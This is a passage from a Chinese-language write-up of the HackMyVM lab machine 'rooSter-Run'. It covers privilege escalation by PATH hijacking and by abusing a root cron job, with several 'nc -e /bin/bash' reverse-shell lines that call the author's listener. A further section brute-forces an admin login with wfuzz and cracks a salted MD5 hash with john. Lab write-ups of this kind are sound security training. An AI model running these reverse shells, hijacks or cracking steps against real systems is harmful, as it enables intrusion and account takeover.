\u53ef\u4ee5\u63d0\u9ad8\u7cfb\u7edf\u7684\u5b89\u5168\u6027\uff0c\u56e0\u4e3a\u5b83\u5141\u8bb8\u7ba1\u7406\u5458\u66f4\u7cbe\u786e\u5730\u63a7\u5236\u8d44\u6e90\u7684\u8bbf\u95ee\u3002\u7136\u800c\uff0c\u5b83\u4e5f\u53ef\u80fd\u589e\u52a0\u7ba1\u7406\u7684\u590d\u6742\u6027\uff0c\u56e0\u4e3a\u9700\u8981\u4ed4\u7ec6\u914d\u7f6e\u6bcf\u4e2a\u8d44\u6e90\u7684\u8bbf\u95ee\u6743\u9650\u3002<\/p>\n<\/blockquote>\n<h3>\u5b9a\u65f6\u4efb\u52a1\u89e6\u53d1&quot;bash&quot;<\/h3>\n<p>\u770b\u4e00\u4e0b\uff0c\u8fd9\u4e2a\u76ee\u5f55\u5e94\u8be5\u4e5f\u662f\u6bd4\u8f83\u5e38\u51fa\u95ee\u9898\u7684\u76ee\u5f55\uff0c\u8fd9\u6b21\u5fd8\u4e86\u770b\u4e86\u3002\u3002\u3002\u3002\u4f46\u662f\u91cc\u9762\u5565\u90fd\u6ca1\u6709<\/p>\n<p>\u4ed4\u7ec6\u770b\u4f1a\u53d1\u73b0\u6709\u4e00\u4e2a\u5947\u602a\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-bash\">#!\/usr\/bin\/env bash<\/code><\/pre>\n<p>\u5b83\u5982\u679c\u8981\u6267\u884c\u7684\u8bdd\u76f4\u63a5<code>#!\/bin\/bash<\/code>\u4e0d\u5c31\u597d\u4e86\uff0c\u6253\u5370\u4e00\u4e0b\u73af\u5883\u53d8\u91cf\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">www-data@rooSter-Run:\/home\/matthieu$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin<\/code><\/pre>\n<p>nice\uff0c\u6211\u4eec\u53ef\u4ee5\u638c\u63a7\u7684\u76ee\u5f55\u5728<code>\/usr\/bin<\/code>\u524d\u9762\uff0c\u6211\u4eec\u5199\u4e00\u4e2abash\u4e22\u5728<code>usr\/local\/bin<\/code>\u91cc\u9762\uff0c\u7136\u540e\u518d\u8ba9\u7528\u6237\u6267\u884c\u7a0b\u5e8f\u53cd\u5f39shell\u8bd5\u8bd5\uff1a<\/p>\n<pre><code class=\"language-bash\"># \/usr\/local\/bin\necho &#039;nc -e \/bin\/bash 172.20.10.8 2345&#039; &gt; bash<\/code><\/pre>\n<p>\u552f\u4e00\u7684\u95ee\u9898\u662f\uff0c\u8fd9\u4e2a\u7a0b\u5e8f\u5f97\u662f\u4e00\u4e2a\u5b9a\u65f6\u4efb\u52a1\uff0c\u800c\u6211\u4eec\u53c8\u6ca1\u6709\u53d1\u73b0\uff0c\u4e0a\u4f20<code>pspy64<\/code>\u5206\u6790\u4e00\u4e0b\uff0c\u4e14\u6162\uff0c\u521a\u51c6\u5907\u4e0a\u4f20\u5c31\u5f39\u56de\u6765\u4e86\uff1b<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840361.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840361.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405160003815\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743\u81f3root<\/h3>\n<p>\u4e0a\u4f20\u4e00\u4e2a<code>pspy64<\/code>\uff0c\u770b\u770b\u8fd8\u6709\u6ca1\u6709\u5176\u4ed6\u7684\u5b9a\u65f6\u4efb\u52a1\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840362.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840362.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405160610449\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>root\u6743\u9650\u6267\u884c\u4e86\u5b9a\u65f6\u4efb\u52a1<code>\/usr\/sbin\/CRON<\/code>\u4ee5\u53ca<code>\/bin\/sh -c \/bin\/bash \/opt\/maintenance\/backup.sh<\/code>\uff0c\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">file cron\ncron: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=9335596096312f1bd1e8a0ab857f0690639a5810, for GNU\/Linux 3.2.0, stripped\n\ncat \/opt\/maintenance\/backup.sh\n#!\/bin\/bash\n\nPROD=&quot;\/opt\/maintenance\/prod-tasks&quot;\nPREPROD=&quot;\/opt\/maintenance\/pre-prod-tasks&quot;\n\nfor file in &quot;$PREPROD&quot;\/*; do\n  if [[ -f $file &amp;&amp; &quot;${file##*.}&quot; = &quot;sh&quot; ]]; then\n    cp &quot;$file&quot; &quot;$PROD&quot;\n  else\n    rm -f ${file}\n  fi\ndone\n\nfor file in &quot;$PROD&quot;\/*; do\n  if [[ -f $file &amp;&amp; ! -O $file ]]; then\n  rm ${file}\n  fi\ndone\n\n\/usr\/bin\/run-parts \/opt\/maintenance\/prod-tasks<\/code><\/pre>\n<p>\u811a\u672c\u6267\u884c\u4e86\u4e24\u4e2a\u4e8b\u60c5\uff1a<\/p>\n<ol>\n<li>\u590d\u5236 <code>PREPROD<\/code> \u76ee\u5f55\u4e0b\u7684\u6240\u6709 <code>.sh<\/code> \u811a\u672c\u6587\u4ef6\u5230 <code>PROD<\/code> \u76ee\u5f55\uff0c\u5e76\u5220\u9664 <code>PREPROD<\/code> \u76ee\u5f55\u4e0b\u975e <code>.sh<\/code> \u6587\u4ef6\u3002<\/li>\n<li>\u5220\u9664 <code>PROD<\/code> \u76ee\u5f55\u4e0b\u4e0d\u5c5e\u4e8e\u5f53\u524d\u7528\u6237\u6240\u6709\u7684\u6587\u4ef6\u3002<\/li>\n<\/ol>\n<p>\u521b\u5efa\u4e00\u628a<code>.sh<\/code>\u6587\u4ef6\uff0c\u5c1d\u8bd5\u8ba9\u4ed6\u590d\u5236\u5230<code>prod-tasks<\/code>\uff0c\u7136\u540e\u8ba9<code>\/usr\/bin\/run-parts<\/code>\u6267\u884c\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) matthieu@rooSter-Run:\/opt\/maintenance$ file \/usr\/bin\/run-parts\n\/usr\/bin\/run-parts: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=9bddbabd4f1a9d2f4646a3190e3bcef23a34d332, for GNU\/Linux 3.2.0, stripped<\/code><\/pre>\n<p>\u62ff\u5230\u672c\u5730\u6765\u53cd\u7f16\u8bd1\u4e00\u4e0b\uff0c\u7b49\u4e00\u4e0b\uff0c\u8c03\u8bd5\u4fe1\u606f\u88ab\u641e\u6389\u4e86\u3002\u3002\u3002\u3002<\/p>\n<p>\u53ea\u80fd\u6478\u9ed1\u5f04\u4e86\uff0c\u5e0c\u671b\u53ef\u4ee5\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/opt\/maintenance\/pre-prod-tasks \necho &#039;nc -e \/bin\/bash 172.20.10.8 3456&#039; &gt; getshell.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840364.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405163131945\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u811a\u672c\u5df2\u7ecf\u6267\u884c\u4e86\uff0c\u4f46\u662f\u4e3a\u4ec0\u4e48\u6ca1\u6709\u5f39\u56de\u6765shell\u5462\uff1f\u53d1\u73b0\u8fd9\u4e2a\u6587\u4ef6\u6240\u6709\u8005\u5df2\u7ecf\u662froot\u4e86\uff0c\u5c1d\u8bd5\u4fee\u6539\u540d\u79f0\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff0c\uff08shell\u811a\u672c\u7684\u540e\u534a\u6bb5\u4f30\u8ba1\u5c31\u662f\u6309\u6697\u793a\uff09\uff1a<\/p>\n<pre><code class=\"language-bash\">mv getshell.sh getshell<\/code><\/pre>\n<p>\u7a0d\u7b49\u7247\u523b\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u5f39\u56de\u6765\uff0c\u6ca1\u6709\u6267\u884c\u6743\u9650\uff0c\u66f4\u6539\u4e00\u4e0b\u6267\u884c\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">cd \/opt\/maintenance\/pre-prod-tasks \necho &#039;nc -e \/bin\/bash 172.20.10.8 3456&#039; &gt;&gt; pwn.sh\nchmod +x pwn.sh\n\ncd \/opt\/maintenance\/prod-tasks\nhead pwn.sh\nmv pwn.sh pwn<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u5f39\u56de\u6765\uff0c\u52a0\u4e0a\u4e00\u4e2a\u5934<\/p>\n<pre><code>cd \/opt\/maintenance\/pre-prod-tasks \necho &#039;#!\/bin\/bash&#039; &gt; exp.sh\necho &#039;nc -e \/bin\/bash 172.20.10.8 3456&#039; &gt;&gt; exp.sh\nchmod +x exp.sh\n\ncd \/opt\/maintenance\/prod-tasks\nhead exp.sh\nmv exp.sh exp<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840365.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840365.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405165715141\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u62ff\u5230shell\uff01\uff01\uff01\uff01\uff01<\/p>\n<p>\u67e5\u770b\u4e00\u4e0bflag\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">cat \/root\/root.txt\n670ff72e9d8099ac39c74c080348ec17\ncd \/home\nls\nmatthieu\ncd matthieu\ncat user.txt\n32af3c9a9cb2fb748aef29457d8cff55<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>\u7206\u7834\u5bc6\u7801<\/h3>\n<p><a href=\"https:\/\/hackmyvm.eu\/public\/?u=kerszi\">\u7eff\u5e08\u5085<\/a>\u5728\u7206\u7834\u90a3\u4e2a\u5bc6\u7801\u7684\u65f6\u5019\u5c1d\u8bd5\u4e86\u53e6\u4e00\u79cd\u601d\u8def\uff0c\u6211\u6ca1\u6709\u60f3\u5230\uff0c\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">wfuzz -w \/usr\/share\/wordlists\/rockyou.txt -d &#039;username=admin&amp;password=FUZZ&amp;loginsubmit=Submit&#039; -u http:\/\/172.20.10.3\/admin\/login.php --hh 4569<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840366.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840366.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405133906909\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u770b\u5230\u5e08\u5085\u95e8\u7684blog\u7206\u7834\u65b9\u5f0f\u666e\u904d\u662f\uff1a<\/p>\n<pre><code class=\"language-bash\">john pass_hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt -rules=best64 -format=dynamic_4<\/code><\/pre>\n<pre><code class=\"language-bash\">john pass_hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt -rules=best64 -format=dynamic_4\nUsing default input encoding: UTF-8\nLoaded 1 password hash (dynamic_4 [md5($s.$p) (OSC) 256\/256 AVX2 8x3])\nWarning: no OpenMP support for this hash type, consider --fork=2\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nhomeandaway      (admin)     \n1g 0:00:00:04 DONE (2024-04-05 02:03) 0.2164g\/s 4363p\/s 4363c\/s 4363C\/s yasmeen..spongy\nUse the &quot;--show --format=dynamic_4&quot; options to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p><a href=\"https:\/\/hackmyvm.eu\/profile\/?user=ll104567\">\u7fa4\u4e3b\u5e08\u5085<\/a>\u8bf4\u901a\u8fc7<code>john --list=formats<\/code>\u53ef\u4ee5\u67e5\u5230\u4f7f\u7528\u54ea\u4e9b\u52a0\u5bc6\u65b9\u5f0f\u7206\u7834\uff0c\u4f46\u662f\u8fd8\u9700\u8981\u67e5\u4e00\u4e0b\u4f7f\u7528\u54ea\u79cd\u52a0\u5bc6\u65b9\u5f0f\uff0c\u7fa4\u4e3b\u5e08\u5085\u63d0\u4f9b\u4e86\u4e00\u79cd\u89e3\u51b3\u65b9\u6848\uff1a(\u6211\u4e5f\u5728\u672c\u5730\u67e5\u4e86\u4e00\u4e0b\uff0c\u4f46\u662f\u5b57\u4f53\u6ca1\u6709\u5e08\u5085\u7684\u597d\u770b\uff0c\u6211\u5c31\u76f4\u63a5\u590d\u5236\u5e08\u5085\u7ed9\u7684\u56fe\u7247\u4e86\uff0c\u5168\u90fd\u662f\u7fa4\u4e3b\u5e08\u5085\u5e2e\u5fd9\u641e\u51fa\u6765\u7684\uff01)<\/p>\n<pre><code class=\"language-bash\">john --list=subformats<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840367.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840367.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f8b\u5982\u8fd9\u91cc\u7684<code>dynamic_4<\/code>\u5c31\u662f\u76d0\u5728\u524d\u9762\uff0c<code>password<\/code>\u5728\u540e\u9762\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u547d\u4ee4\u8fdb\u884c\u89c4\u5b9a\uff1a<\/p>\n<pre><code class=\"language-bash\">john pass_hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=dynamic=&#039;md5($s.$p)&#039;\n[1]  + killed     wfuzz -w \/usr\/share\/wordlists\/rockyou.txt -d  -u  --hh 4549\nUsing default input encoding: UTF-8\nLoaded 1 password hash (dynamic=md5($s.$p) [256\/256 AVX2 8x3])\nWarning: no OpenMP support for this hash type, consider --fork=2\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nhomeandaway      (admin)     \n1g 0:00:00:02 DONE (2024-04-05 02:34) 0.3623g\/s 7304p\/s 7304c\/s 7304C\/s yasmeen..spongy\nUse the &quot;--show --format=dynamic=md5($s.$p)&quot; options to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p>\u95ee\u9898\u6765\u4e86\uff0c\u8fd9\u91cc\u7684\u52a0\u76d0\u5b9e\u9645\u4e0a\u76d0\u662f\u5728\u540e\u9762\u7684\u3002\u3002\u3002\u3002\u7136\u540e\u6211\u95ee\u4e86\u4e00\u4e0b\u7fa4\u4e3b\uff0c\u4ed6\u7ed9\u51fa\u4e86\u4e00\u4e9b\u89e3\u91ca\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840368.jpg'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840368.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"VeryCapture_20240405145359\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5982\u679c\u4f60\u4e5f\u60f3\u8ba9\u7fa4\u4e3b\u5927\u5927\u6307\u70b9\uff0c\u53ef\u4ee5\u52a0\u5165\u4e00\u4e0b\u6211\u4eec\u7684\u7fa4\uff1a<code>660930334<\/code>\uff0c\u4e3a\u7fa4\u4e3b\u5927\u5927\u70b9\u8d5e\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840369.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840369.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405145811092\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u7fa4\u4e3b\u5927\u5927\u63d0\u4f9b\u4e86\u4e00\u79cd\u601d\u8def\uff0c\u6211\u4eec\u5b9e\u8df5\u4e00\u4e0b\uff1a<\/p>\n<p>\u4ee5<code>123456<\/code>(rockyou\u7b2c\u4e00\u4e2a\u5bc6\u7801)\u4e3a\u4f8b\uff0c\u76d0\u503c\u4f7f\u7528<code>hackmyvm<\/code> --&gt; <code>6861636b6d79766d<\/code>\uff0c\u5c1d\u8bd5\u590d\u73b0\u4e00\u4e0b\uff1a<\/p>\n<p>\u9996\u5148\u5c31\u662f\u4e00\u4e2a\u5927\u5751\uff0c\u8bf7\u770b<code>VCR<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840370.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840370.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405181626642\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840371.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840371.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405181657295\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>so\u53d1\u73b0\u4e86\u5417\uff0cecho\u81ea\u5e26\u6362\u884c\u7b26\u7684\u3002\u3002\u3002\u3002\u3002<\/p>\n<p>\u6240\u4ee5\u6211\u4eec\u5c31\u5f97\u5c0f\u5fc3\u4e86\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">echo -n &quot;1234566861636b6d79766d&quot;|md5sum |cut -d&quot; &quot; -f1 &gt; hashr\necho -n &quot;6861636b6d79766d123456&quot;|md5sum |cut -d&quot; &quot; -f1 &gt; hashl<\/code><\/pre>\n<pre><code class=\"language-bash\">echo &#039;4cc1d0e2ba8ae43d7efe5715b60f045c$6861636b6d79766d&#039; &gt; addsalthashr\necho &#039;e294fd515d73bfca98301b9a6068b1ae$6861636b6d79766d&#039; &gt; addsalthashl<\/code><\/pre>\n<pre><code class=\"language-bash\">john addsalthashr --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=dynamic=&#039;md5($s.$p)&#039;\njohn addsalthashr --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=dynamic=&#039;md5($p.$s)&#039;\njohn addsalthashl --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=dynamic=&#039;md5($p.$s)&#039;\njohn addsalthashl --wordlist=\/usr\/share\/wordlists\/rockyou.txt --format=dynamic=&#039;md5($s.$p)&#039;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840372.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840372.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240405183205220\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6240\u4ee5john\u4f1a\u81ea\u52a8\u8bc6\u522b\u76d0\u662f\u8c01\uff0chash\u662f\u54ea\u4e2a\uff0c\u6211\u4eec\u90a3\u4e2aformat\u53ea\u662f\u89c4\u5b9a\u4e86\u5bc6\u7801\u548c\u76d0\u5728\u52a0\u5bc6\u524d\u7684\u76f8\u5bf9\u4f4d\u7f6e\uff01\u611f\u8c22\u7fa4\u4e3b\u5e08\u5085\uff01<\/p>\n<p>\u7fa4\u4e3b\u5e08\u5085\u7684\u6f14\u793a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840373.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404051840373.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"img\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u653e\u5165\u6587\u4ef6\u8bfb\u53d6\u4e5f\u662f\u4e00\u6837\u7684\uff0c\u4e0d\u7ba1\u4f60\u51e0\u884c\u90fd\u4f1a\u6709\u6362\u884c\u7b26\uff01<\/p>\n<p><div 